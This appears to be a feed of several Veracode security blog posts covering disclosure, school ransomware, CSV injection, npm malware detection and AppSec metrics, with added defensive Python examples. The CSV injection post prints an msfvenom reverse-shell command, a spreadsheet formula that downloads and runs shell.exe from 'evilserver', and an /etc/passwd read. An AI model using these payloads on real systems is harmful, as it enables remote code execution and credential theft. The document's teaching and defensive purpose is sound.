Organizations as <a href="">conservative as federal and state agencies</a> are exploring the need for coordinated disclosure processes.</p> <p>Veracode recently commissioned a <a href="">report with 451 Group</a> to explore the attitudes and perceptions around coordinated disclosure. Our intent in commissioning this research was to establish a current view of perceptions around coordinated vulnerability disclosure and to define a set of clear recommendations that help businesses progressively deliver on the objective of developing software that is secure from the start.</p> <p>The report showed that 90 percent of security and development professionals believe coordinated disclosure serves a public good. This same report also found that one-third of organizations received an unsolicited vulnerability alert in the past 12 months – and that 90 percent of these were done in a coordinated manner, in which the independent security researcher worked with the company to fix the vulnerability.</p> <p>As Chris Wysopal, Veracode CTO, commented on the report:</p> <p><em>“The alignment that the study reveals is very positive,” said Veracode Chief Technology Officer and co-founder Chris Wysopal. “The challenge, however, is that vulnerability disclosure policies are wildly inconsistent. If researchers are unsure how to proceed when they find a vulnerability it leaves organizations exposed to security threats giving criminals a chance to exploit these vulnerabilities. Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization’s security strategy and allows researchers to work with an organization to reduce its exposure.
A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.”</em></p> <p>Past perceptions around independent security researchers were that they were motivated by money from bug bounty programs or would blackmail a company into paying them for the vulnerability information. This study showed that this perception is far from the truth. Only 18 percent of security researchers expect to be paid for finding a vulnerability, and only 16 percent expect some sort of recognition. Conversely, 37 percent expect information validating the fix – suggesting independent researchers are more interested in creating more secure software than notoriety or financial gain.</p> <p>The good news is most companies today have an established process for working with independent security researchers. When coordinated disclosure programs become part of an overall software security strategy along with a DevSecOps program that integrates security testing right into the development process, we all benefit from the software powering our world being more secure.</p> <p>See highlights from the report’s findings in the infographic below.</p> <p> <div class="media media-element-container media-default"> <div id="file-23416" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive media-wysiwyg-align-left" src="//" height="4823" width="792"> </div> </div> </div></p> <p>&nbsp;</p> Wed, 18 Sep 2019 16:14:11 -0400 (lpaine) ver43306 Why Are Schools Increasingly Targeted by Cyberattackers? <img src="/sites/default/files/styles/resize_960/public/cyberattacks_schools.png?itok=aLHN6L-D" width="960" height="480" typeof="foaf:Image" /><p>Schools, including universities, are increasingly becoming cyberattack targets.
Just this month, the <a href="">Monroe-Woodbury</a> school district in Orange County, NY had to delay the start of school due to cyberattacks. And this incident was only one of a handful of cyberattacks on New York state school districts this summer. One school system, <a href="">Rockville Centre in Nassau County</a>, paid a cyberattacker $88,000 after a ransomware attack shut down the district’s mainframe.</p> <p>And New York is not alone. This summer, school districts in <a href="">Oklahoma, New York, and Virginia</a> have been victims of ransomware. The Louisiana governor declared a state of emergency after multiple ransomware attacks crippled several school districts, and <a href="">schools in Flagstaff, AZ</a> closed for two days this month due to a ransomware attack.</p> <p>The attacks don’t stop after grade 12 either. <a href="">Two universities</a>, Regis University in Denver, CO and Stevens Institute of Technology in Hoboken, NJ, were also targeted right before the start of this school year.</p> <p>Anthony Carfora of the Lupinskie Center for Curriculum, Instruction and Technology said in an interview with CBS New York, “Ransomware is prolific right now and there’s more of it going on in government and education institutions than in private industry. We seem to be targets now.”</p> <h4><strong>Why are schools being targeted?</strong></h4> <p>Schools’ appeal to cyberattackers stems, in part, from the fact that most <a href="">don’t have robust cybersecurity systems or personnel</a> and struggle to prevent and respond to attacks. They have the added challenge of needing to give their students and teachers the academic freedom to learn and explore and do research. This often requires a more lax security posture than the locked-down environment of an enterprise.
They also house a lot of sensitive data, and are heavily reliant on software.</p> <p>Another wrinkle: the users of that software might find it worthwhile to take a look under the hood. Veracode co-founder Chris Wysopal notes that, “schools use a lot of applications, which put them at the mercy of their vendors to build secure software, and requires that they have a good coordinated disclosure process to respond to security researchers, who in their case are often going to be students.”</p> <p>Just last month at DEF CON, a teenager presented on all the vulnerabilities he found over the past three years in his school’s educational software. <a href="">Wired</a> reported that the teen “found a series of common web bugs in [the software], including so-called SQL-injection and cross-site-scripting vulnerabilities … those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records.”</p> <p>After he reported the flaws to the two software companies, he got little to no response. That is, until he used one of the vulnerabilities to trigger a push notification saying “hello” to all users. The software companies responded, and one has stated that it’s working to improve its vulnerability disclosure program.</p> <h4><strong>Steps schools can take</strong></h4> <p>Beyond working with vendors to ensure the security of software they are purchasing, and developing robust vulnerability disclosure programs, Wysopal recommends that schools consider “separating the administration network, which has the sensitive data the school needs to operate, from the teaching or lab network, where this data isn’t needed.” In this way, the school can maintain the academic freedoms while compartmentalizing data to reduce risk.</p> <p>Want more security news and best practices?
<a href="">Subscribe</a> to our content.</p> Thu, 12 Sep 2019 12:30:04 -0400 (sciccone) ver43136 Data Extraction to Command Execution CSV Injection <img src="/sites/default/files/styles/resize_960/public/Avoiding%20CSV%20injection.png?itok=Gy0gjwO_" width="960" height="480" typeof="foaf:Image" /><p>As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode???s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default). It should be noted that this type of attack would also affect LibreOffice as it would also interpret the payload as formula.</p> <h4><strong>Attack Requirements</strong></h4> <p>In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.</p> <h4><strong>Basic Attack</strong></h4> <p>1. Search the application to find a location where any data input can be extracted.</p> <p> <div class="media media-element-container media-default"> <div id="file-23171" class="file file-image"> <div class="content"> <img style="" alt="" title="" class="media-element file-media-responsive" src="//" height="64" width="409"> </div> </div> </div></p> <p>2. 
Inject the payload =HYPERLINK("<a href="http://www.veracode.com/">http://www.veracode.com</a>", "Click for Report")</p> <p>3. Confirm the application is vulnerable to this type of attack: extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.</p> <p>4. You can then see a "Click for Report" link in the Excel file. This indicates the payload has been injected correctly.</p> <p>In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:</p> <p>Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we control, which hosts a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. 
There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We look at one of these attacks below.</p> <h4><strong>Advanced Attack: Remote Command Execution</strong></h4> <p>A more advanced attack uses the same method as above but with a different payload, which leads to remote code execution. This type of attack depends on a number of factors and might not always be possible. However, it's still worth considering, and it highlights how serious this vulnerability can be under the right circumstances.</p> <h4><strong>Attack in Steps</strong></h4> <p>1. We'll use a shell.exe file, which can contain whatever we want to execute on the system; in this scenario, we use msfvenom to create a reverse Meterpreter payload.</p> <p>msfvenom -p windows/meterpreter/reverse_tcp -a x64 --platform Windows LHOST=&lt;IP Address&gt; LPORT=1234 -f exe &gt; shell.exe</p> <p>2. We also need to set up a listener that will wait for the connect back once the shell.exe payload has been executed on the victim's machine. We use the Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.</p> <p>3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the command python -m SimpleHTTPServer 1337, which starts a simple web server serving the current directory on my system. A real attack might host this on a compromised web server.</p> <p>4. 
Once all this has been set up, we inject the payload into the application and wait for a victim to download the CSV file and click on the cell containing the payload.</p> <p>=cmd|' /C powershell Invoke-WebRequest "<a href="http://evilserver:1337/shell.exe">http://evilserver:1337/shell.exe</a>"</p> <p>-OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1</p> <h4><strong>Breakdown of Payload</strong></h4> <ul> <li>The first line calls cmd, which passes the command to PowerShell; Invoke-WebRequest downloads shell.exe from our evilserver on port 1337. Note that if the host is running PowerShell version 2, Invoke-WebRequest won't work.</li> <li>The next line saves shell.exe into the temp directory. We use the temp directory because it's a folder any user can write to.</li> <li>We then start a process to execute the downloaded shell.exe payload.</li> </ul> <p>5. Once the victim opens the file, the CSV injection payload runs. However, Excel may first present a "Remote Data Not Accessible" warning. Most victims will assume the file has come from a legitimate source and select Yes to view the data. Note that in this scenario the Excel file is empty apart from our payload; in a real-world attack, it would be populated with information from the application.</p> <p>6. Once the victim selects Yes, within a few moments Metasploit receives a reverse connection from the victim's host.</p> <p>7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. 
This includes, but is not limited to, stealing passwords from memory, attacking other systems on the network (if this host is connected to one), taking over users' webcams, and so on. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.</p> <p>When testing for CSV injection, in most instances a tester will use a simple payload, for a number of reasons. It's not uncommon for a tester to demonstrate this type of attack with a HYPERLINK payload like the one above, or a simple cmd payload like the following: =cmd|'/C cmd.exe '!'A</p> <p>Some might also use the following payload, depending on the operating system: ='file://etc/passwd'#$passwd.A1</p> <p>This reads the first line of the /etc/passwd file on a Linux system.</p> <h4><strong>Mitigating the Risk</strong></h4> <p>The best way to mitigate this type of attack is to make sure all user input is filtered so that only expected characters are allowed. Client-supplied input should always be considered unsafe and treated with caution when processing. CSV injection, like many other web attacks, is a side effect of weak input validation. To mitigate CSV injection, a default-deny ("whitelist") regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files use equals signs (=), plus signs (+), minus signs (-), and "at" symbols (@) to denote formulas, we recommend filtering these out to ensure no cell begins with these characters. Any element that could appear in a report could be a target for Excel / CSV injection and should be validated accordingly.</p> <p>In summary, CSV injection is not a new attack vector, but it's one that developers often forget about. 
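</p> <p>The following is an added example, not code from the original post, showing one way to apply the advice above on the export side of a web application: a CSV writer that neutralizes any cell beginning with a formula trigger by prefixing it with an apostrophe, plus a scanner that flags such cells in an existing CSV so a defender can check an export before release or an uploaded file before it is served to users. It goes slightly beyond the post's list: besides =, +, -, and @, it treats a leading tab or carriage return as a trigger, because OWASP's CSV injection guidance lists those as well. The sample rows, the unsafe export and the function names are constructed here for illustration.</p>

```python
import csv
import io

# Leading characters that Excel and LibreOffice treat as the start of a formula.
# '=', '+', '-' and '@' are the four named in the post; TAB and CR are added
# because OWASP's CSV injection guidance lists them as triggers too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return the cell text with a leading apostrophe if it would otherwise be
    interpreted as a formula. The apostrophe makes spreadsheet applications
    render the content as literal text."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(header, rows):
    """Serialize rows to CSV, neutralizing every data cell. QUOTE_ALL doubles any
    embedded double quotes so a value cannot terminate its field early."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan CSV text and return (row, column, value) for every cell that starts
    with a formula trigger, so an export or an upload can be checked."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


# Constructed sample data: the "note" field carries the two payloads shown in
# the post (a HYPERLINK formula and a file:// read) plus a harmless value.
SAMPLE_HEADER = ["username", "note"]
SAMPLE_ROWS = [
    ["alice", '=HYPERLINK("http://www.veracode.com", "Click for Report")'],
    ["bob", "='file://etc/passwd'#$passwd.A1"],
    ["carol", "meeting moved to 3pm"],
]

# Constructed raw export, as an application without neutralization would emit it.
UNSAFE_CSV = (
    "username,note\n"
    'alice,"=HYPERLINK(""http://www.veracode.com"", ""Click for Report"")"\n'
    "bob,='file://etc/passwd'#$passwd.A1\n"
    "carol,meeting moved to 3pm\n"
)

if __name__ == "__main__":
    print("cells flagged in unsafe export:", find_formula_cells(UNSAFE_CSV))
    safe = export_csv(SAMPLE_HEADER, SAMPLE_ROWS)
    print(safe)
    print("cells flagged in safe export:", find_formula_cells(safe))
```

<p>The apostrophe is what makes the spreadsheet render the cell as text; quoting the field (which csv.writer does here) only keeps commas and quotes inside a value from splitting or breaking the record, so the two measures do different jobs. Rejecting these characters at the input side, as the post recommends, is the complementary control; neutralizing at export covers data that reached the database before the validation was in place.</p> <p>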
As more web applications have the ability to export data, it's one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks, like XSS.</p> Fri, 06 Sep 2019 10:40:38 -0400 (jrougvie) ver43091 Discovering Malicious Packages Published on npm <img src="/sites/default/files/styles/resize_960/public/malicious_package_discovery.png?itok=Y7eRFkrB" width="960" height="480" typeof="foaf:Image" /><p>Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.</p> <p>This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages in order to preempt such threats.</p> <h4><strong>The problem</strong></h4> <p>In November 2018, a malicious package named "flatmap-stream" was discovered as a transitive dependency of a popular library, "event-stream," with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, "3.3.6," adding malicious code to steal cryptocurrency. This went undetected for two to three months.</p> <p>In a separate incident from June 2019, a malicious package, "electron-native-notify," was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This also went undetected for two to three months.</p> <h4><strong>Detection of the problem</strong></h4> <p>Malicious packages tend to exhibit a number of common patterns. 
To understand the common patterns contained in malicious packages, we looked at a past research paper, "Static Detection of Application Backdoors," as well as going through publicly reported incidents to come up with the following list.</p> <p><em>Obfuscation</em></p> <p>Malicious packages tend to hide payloads using encoding methods such as base64 and hex. Such APIs are typically used only by libraries that implement low-level protocols or provide utility functions, so finding them elsewhere is a good indicator that a package is malicious.</p> <p><em>Reading of sensitive information</em></p> <p>Sensitive information is data from the environment that libraries should only be reading with good reason. This includes files like "/etc/shadow," "~/.aws/credentials," or SSH private keys.</p> <p><em>Exfiltration of information</em></p> <p>Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.</p> <p><em>Remote code execution</em></p> <p>A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.</p> <p><em>Typo-squatting</em></p> <p>While typo-squatted packages are not always malicious, they are a red flag. We deem typo-squatted packages malicious, since they may provide the exact same functionality and interface, and may update their payload once other popular packages come to depend on them.</p> <h4><strong>Implementation of a detector for malicious packages</strong></h4> <p>To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. 
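</p> <p>As an added example, and not the detector described in this post, here is a stripped-down Python version of the same idea that applies the typo-squatting, hardcoded-URL, sensitive-file, encoding and lifecycle-script patterns listed above to a single package. It assumes a short constructed list of popular names in place of the top-1000 list, pulls string literals out of the JavaScript source with a regular expression rather than from the abstract syntax tree, and counts an adjacent-character swap as one edit (the optimal string alignment variant of Levenshtein distance), because under plain Levenshtein "mogobd" is three edits from "mongodb" rather than two. The sample package.json and source are constructed to mirror the host-information beacon the post attributes to node-ftp; the collector hostname is a placeholder, and every function name is this example's own.</p>

```python
import re

# Constructed stand-in for the "top 1000 packages" list the post compares against.
POPULAR_PACKAGES = ["mongodb", "mongoose", "axios", "serialize", "express", "koa-body"]

# Files a library has no business reading: the post's examples plus the usual
# SSH private key file name.
SENSITIVE_PATHS = ("/etc/shadow", ".aws/credentials", "id_rsa")

# npm lifecycle scripts that run code on the consumer's machine; "test" is
# included because the post notes payloads hidden under that script name.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "test")

# Quoted string literals ('...', "..." or `...`) with backslash escapes honoured.
STRING_LITERAL = re.compile(r"""(["'`])((?:\\.|(?!\1).)*)\1""", re.S)
URL_LIKE = re.compile(r"^https?://", re.I)
ENCODING_LITERALS = ("base64", "hex")


def edit_distance(a, b):
    """Optimal string alignment distance: Levenshtein plus an adjacent
    transposition counted as one edit."""
    n, m = len(a), len(b)
    d = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        d[i][0] = i
    for j in range(m + 1):
        d[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[n][m]


def typosquat_targets(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Popular names within max_distance edits of `name`, excluding an exact match."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


def string_literals(js_source):
    return [m.group(2) for m in STRING_LITERAL.finditer(js_source)]


def scan_package(name, package_json, js_source):
    """Run the lightweight detectors over one package. Returns a dict of
    findings; an empty dict means nothing was flagged."""
    findings = {}
    literals = string_literals(js_source)

    squats = typosquat_targets(name)
    if squats:
        findings["typosquat_of"] = squats

    urls = [s for s in literals if URL_LIKE.match(s)]
    if urls:
        findings["hardcoded_urls"] = urls

    sensitive = [s for s in literals if any(p in s for p in SENSITIVE_PATHS)]
    if sensitive:
        findings["sensitive_paths"] = sensitive

    encodings = sorted({s.lower() for s in literals if s.lower() in ENCODING_LITERALS})
    if encodings:
        findings["encoding_apis"] = encodings

    hooks = [h for h in LIFECYCLE_HOOKS if h in package_json.get("scripts", {})]
    if hooks:
        findings["lifecycle_hooks"] = hooks
    return findings


# Constructed sample mimicking the behaviour the post attributes to "node-ftp":
# a postinstall script that posts host details to a hardcoded server.
SAMPLE_NAME = "mogobd"
SAMPLE_PACKAGE_JSON = {"name": SAMPLE_NAME, "scripts": {"postinstall": "node setup.js"}}
SAMPLE_SOURCE = """
const os = require('os');
const https = require('https');
const body = JSON.stringify({ h: os.hostname(), t: os.type(), u: os.uptime(), d: os.tmpdir() });
https.request('https://collector.example.invalid/report', { method: 'POST' })
     .end(Buffer.from(body).toString('base64'));
"""

if __name__ == "__main__":
    print(scan_package(SAMPLE_NAME, SAMPLE_PACKAGE_JSON, SAMPLE_SOURCE))
```

<p>A package that trips several detectors at once is the kind of candidate worth manual review; any single detector on its own yields the false positives the post mentions (a legitimate HTTP client library contains URL literals, and a codec library legitimately names base64).</p> <p>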
False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.</p> <p>Two example analyses:</p> <ul> <li>To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.</li> <li>To detect typo-squatting, we looked for package names within a maximum Levenshtein distance of 2 of the names of the top 1000 packages, e.g., "mogobd" vs. "mongodb."</li> </ul> <p>We ran these only on the latest versions of packages.</p> <h4><strong>Results</strong></h4> <p>The full analysis took less than a day and uncovered 17 new malicious packages:</p> <ul> <li>axioss</li> <li>axios-http</li> <li>body-parse-xml</li> <li>sparkies</li> <li>js-regular</li> <li>file-logging</li> <li>mysql-koa</li> <li>import-mysql</li> <li>mogodb</li> <li>mogobd</li> <li>mogoose</li> <li>mogodb-core</li> <li>node-ftp</li> <li>serializes</li> <li>serilize</li> <li>koa-body-parse</li> <li>node-spdy</li> </ul> <p>We disclosed these malicious packages to the npm security team, and they were yanked from the registry.</p> <p>Most of the malicious packages above hide their payloads as a "test" and use pre-/post-/test-install scripts to exfiltrate information. For example, "node-ftp" exposes the host information of the victim by sending the values of "os.hostname()," "os.type()," "os.uptime()," and "os.tmpdir()" 
to its server.</p> <h4><strong>Disclosure timeline</strong></h4> <p>The disclosure timeline was as follows:</p> <ul> <li>2019-07-31 Discovery of malicious packages</li> <li>2019-08-01 Disclosure to npm security team</li> <li>2019-08-01 Acknowledgement from npm security team</li> <li>2019-08-01 Packages yanked from npm</li> <li>2019-08-02 Vulnerability database updated</li> <li>2019-08-30 Public disclosure on npm security advisories</li> </ul> <h4><strong>Conclusion</strong></h4> <p>This activity of finding undetected malicious packages has further confirmed our suspicion that harmful libraries exist out in the open, and is only the beginning of our effort to turn over every stone and reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits of public packages, then generalize these techniques to other package managers like RubyGems.</p> Wed, 04 Sep 2019 10:35:46 -0400 (mang) ver43046 Tips for Kicking Off Your Veracode Security Program Manager Relationship <img src="/sites/default/files/styles/resize_960/public/SPM_relationship.png?itok=X7Qu00Z9" width="960" height="480" typeof="foaf:Image" /><p>If you're a Veracode customer, there's a good chance that you've heard of, or maybe even work with, a <a href="//"><strong>Veracode security program manager</strong></a> (SPM). For those of you who might not know, SPMs help you define the goals of your application security program, onboard your team, answer any questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.</p> <p>If you're just kicking off your relationship with your program manager, you might be wondering what to expect on your initial calls, and how you can make the most of the time you spend interacting with each other. 
Here are a few things you should keep in mind:</p> <h4><strong>How are you developing software?</strong></h4> <p>To realize the value of your investment, we need to understand how your development process works. Right off the bat, your security program manager will want to talk about your existing tech stack (the technology you're currently using to make your software). There's a good chance that your organization is in a different place at the time of your kickoff call than it was when your sales cycle closed. Yes, your account executive will tell your program manager all that he or she knows about your status at the time of closing, but in case anything <em>does</em> change, it's better to hear everything straight from the horse's mouth. Helping us understand the size of your software footprint is also key: are you licensed for 10 apps, but have a total of 300, or 3,000? How are they governed from a development and security standpoint? Having everyone on the same page on these basics is a good first step towards maturing your AppSec program.</p> <h4><strong>Who are the key players?</strong></h4> <p>You should also have a clear idea of what your organizational layout is, as well as who the key players are on the development and security sides. Your SPM will know who your key players are, but they likely won't have met and interacted with them as much as the account executive has. In addition, if your sales cycle has been particularly long, it's possible the key players have changed. Be prepared to fill your security program manager in on everyone who has a stake in your AppSec program on the development AND security sides of your organization. 
Additionally, if there's any turnover within your company down the line, knowing everyone who's involved will ensure that SPMs have multiple stakeholders with program context who they can go to in order to keep momentum.</p> <p>SPMs will also want to know the informal structure of your organization, or the "politics." It can be helpful to know whether your development and security teams are on the same page when it comes to the priority of AppSec, or whether they get along at all! The more insight your SPM has into your organization, the better prepared you can be, as a team, to work together moving forward.</p> <h4><strong>Align your goals and expectations appropriately</strong></h4> <p>Often, the goals that customers set up with Veracode and the goals within their own organizations tend to be two different things. Establish a list of realistic goals, and be prepared to take incremental steps to get there. Rome wasn't built in a day, and neither is a fully mature application security program.</p> <p>Once you have your manageable goals, establish who is responsible for each one, and how they're going to be held accountable for meeting it. You'll need to establish clear channels of communication and accountability internally. For example, when you're coming up with a plan to remediate flaws, engage development and product management as soon as you have flaw scopes. Make sure that the amount of remediation you're targeting is realistic for the desired deadline, and let development know about the remediation resources available in the Veracode platform and in the Services organization in case they get stuck. Your SPM can absolutely help you have that conversation!</p> <p>When it comes to expectations, have an understanding of the driver behind <em>why</em> Veracode was purchased. In some cases, your buyer might not communicate the driving factor to the person running the program (maybe you!). 
Regardless of which end you're on, make sure that your internal plan is well communicated to everyone who's involved across the organization.</p> <p>At the end of the day, we want you to be successful in your application security journey. By keeping these tips in mind, you're already one step closer to success. You can find out more by talking to other Veracode customers about how they've found success with their application security programs in the <a href=""><strong>Veracode Community</strong></a>.</p> Tue, 03 Sep 2019 10:07:53 -0400 (adewberry) ver43016 Veracode Customers Improve Mean Time to Remediation by 90% <img src="/sites/default/files/styles/resize_960/public/2020-01/Veracode%20Forrester%20TEI%20Blog%20Post_0.png?itok=Q5WkcETQ" width="960" height="480" alt="" typeof="foaf:Image" /><p>Bill Gates is well known for treating time as a scarce resource, and in 1994, John Seabrook published a piece in <em>The New Yorker</em> <a href="">detailing an email exchange</a> he carried on with the famous technologist. Seabrook notes that Gates' reverence for time was evident in his correspondence: skipping salutations and pleasantries, leaving spelling mistakes and grammatical errors in line, and never addressing the journalist by his name. In one of the emails, Gates wrote that "the digital revolution is all about facilitation: creating tools to make things easy."</p> <p>Software is the heart of the global economy, and it has paved the way for increased productivity, simplified workflows, and has helped leaders build businesses beyond their wildest dreams. 
It has changed the way that security practitioners and developer teams view and manage time, through agile methodology and sprint planning facilitated by tools like JIRA.</p> <p>Just as minutes, hours, and days can be the difference between meeting sprint deadlines and maintaining speed to market, time is also the difference between preventing a <a href="//">massive data breach</a> and being the victim of one. However, although a cutting-corners approach may work well for email correspondence between colleagues, and perhaps journalists, using this timesaving approach when crafting code has the potential to be downright dangerous. Organizations today need to balance time to market and code quality, which includes code security.</p> <p><strong>How organizations reduced mean time to remediation and saw a 63% ROI with Veracode</strong></p> <p>We recently commissioned the Forrester Total Economic Impact<sup>TM</sup> of Veracode Application Security Platform study to learn how our customers' security and developer teams are strengthening the security posture of their applications by reducing mean time to remediation (MTTR) through DevSecOps practices built on our solutions. Based on interviews with Veracode customers in insurance, healthcare, finance, and information technology services, Forrester created a TEI framework, composite company, and an associated ROI analysis to illustrate financial impact.</p> <p>The report found that prior to using Veracode, the composite organization experienced 60 flaws per MB of code, even though it was using other application security testing solutions. 
After adopting the Veracode Platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50 percent to 90 percent over three years.</p> <p>Additionally, by implementing DevSecOps practices, building stringent security controls, and integrating vulnerability testing into their CI/CD pipeline, our customers were able to reduce mean time to remediation by 90 percent. Resolutions that previously took 2.5 hours on average were reduced to 15 minutes, helping developers reduce the time they spend remediating flaws by 47 percent. This stands to reason, given that our <a href="//">State of Software Security Volume 9</a> (SOSS Vol. 9) found that the most active DevSecOps teams fix flaws 11.5x faster than the typical organization.</p> <p>By using <a href="//">Veracode Greenlight</a> and <a href="//">Veracode Software Composition Analysis</a>, developer teams were able to identify issues while they were coding, which reduced the likelihood that flaws would reach later stages of production. What's more, our customers' developer teams introduced fewer flaws into their code, and those flaws took less time to resolve because we offered them contextual information about the data path and call stack of their code.</p> <p><strong>It's not enough to find security flaws quickly if you're not remediating the right ones quickly</strong></p> <p>Most companies <a href="//">prioritize high-severity and critical vulnerabilities</a> because they are less complicated to attack, offer greater opportunity for complete application compromise, and are more likely to be remotely exploitable. The trouble is that a low-severity vulnerability that sits on the execution path may put your application at greater risk than a high-severity vulnerability in code your application never actually calls. 
The exploitability of a vulnerability is a critical consideration that many organizations overlook.</p> <p>In our analysis of flaw persistence in SOSS Vol. 9, we found that organizations hit the three-quarters-closed mark about 57 percent sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low-severity flaws were attended to at a significantly slower rate than the average speed of closure: it took organizations an average of 604 days to close three quarters of these weaknesses.</p> <p>With many tools out there, developers will receive an extremely large list of vulnerabilities, including those in open source libraries packaged in your application, and they will have to make a judgment call on <a href="">what to fix first</a>, and how much is worth fixing before pushing to production. The stark reality is that the time it takes developers to fix security flaws has a much larger impact on reducing risk than any other factor.</p> <p>Veracode offers developers the opportunity to write secure code, limit the vulnerabilities introduced into production, and prioritize vulnerabilities with our <a href="">vulnerable method approach</a>, expert <a href="//">remediation coaching</a>, and <a href="//">security program managers</a>. To learn more about how the Veracode Platform enables security and development teams to work in stronger alignment, reduce mean time to remediation, and boost an organization's bottom line, download the <a href="">Forrester Total Economic Impact<sup>TM</sup> of Veracode Application Security Platform</a>.</p> Tue, 03 Sep 2019 08:30:00 -0400 (lpaine) ver41566 Should You Be Measuring Flaw Rate? <img src="/sites/default/files/styles/resize_960/public/AppSec_metrics.png?itok=jijKPVvZ" width="960" height="480" typeof="foaf:Image" /><p>Metrics, or perhaps more accurately the right metrics, are crucial for understanding what's really happening in your AppSec program. 
They serve a dual purpose: they demonstrate your organization's current state, and also show what progress it's making in achieving its objectives.&nbsp;</p> <p>We typically recommend our customers measure their compliance against their own internal AppSec policy, plus scan activity, flaw prevalence, and time to resolve.&nbsp;</p> <p>Flaw rate is another metric you might want to consider tracking. Although this would be a secondary metric, unlike the primary ones listed above, flaw rate, which allows you to do a before-and-after flaw comparison for an application, provides insight into how your rate of security findings is improving over time. Veracode analytics allows you to create the flaw rate metric by using a formula and adding it to your chart in order to visualize the rate alongside any other data you are reporting, such as flaw rate per application, first scan vs. most recent scan, or flaw rate per application per severity of finding.</p> <p>Keep in mind that this metric, as with flaws per MB, can vary significantly based on the size of the codebase. A monolithic, legacy application is going to have a much different flaw rate (and flaw density as measured by flaws per MB) than a small, new microservice. The value lies in comparing an application's initial flaw rate to its current flaw rate, or comparing the flaw rate for a team across several applications (again, the initial flaw rate vs. the current). This allows users to get a handle on what is working, or not, for that team to help them close out security findings and reduce the number they are introducing in the first place. In this way, you could validate the impact of your AppSec eLearning or other training. 
I would caution against comparing flaw rate (again, much like flaws per MB) between teams or between business units, as this won't directly provide much actionable insight beyond which one is doing better.&nbsp;</p> <p>Note that this metric will not produce an accurate gauge of your program's success. Since it is applicable only to static analysis, it doesn't take all testing techniques into account. Policy compliance is ultimately the best metric for measuring and reporting on the overall progress of your program.</p> <p>But you could use flaw rate as an additional data point, alongside the following metrics, when reporting on the effectiveness or progress of your AppSec program:</p> <p><strong>Policy compliance</strong>: Your application security policy should stem from an analysis of your entire application inventory. From there, you assign groups of applications different risk categories or ratings by asking questions such as:</p> <ul> <li>Do these applications touch PII?</li> <li>Are they Internet-facing?</li> <li>What would be the impact of a compromise of this system (i.e., is it business critical)?</li> </ul> <p>Based on those answers, you can determine which scan frequency and testing types are required, as well as which types or severities of flaws to disallow: an Internet-facing application that contains PII will have a different risk categorization from an internal chat service and thus should be held to a different standard for security.</p> <p>Additionally, this risk rating will determine the required scanning frequency. Low-risk functionality that is rarely 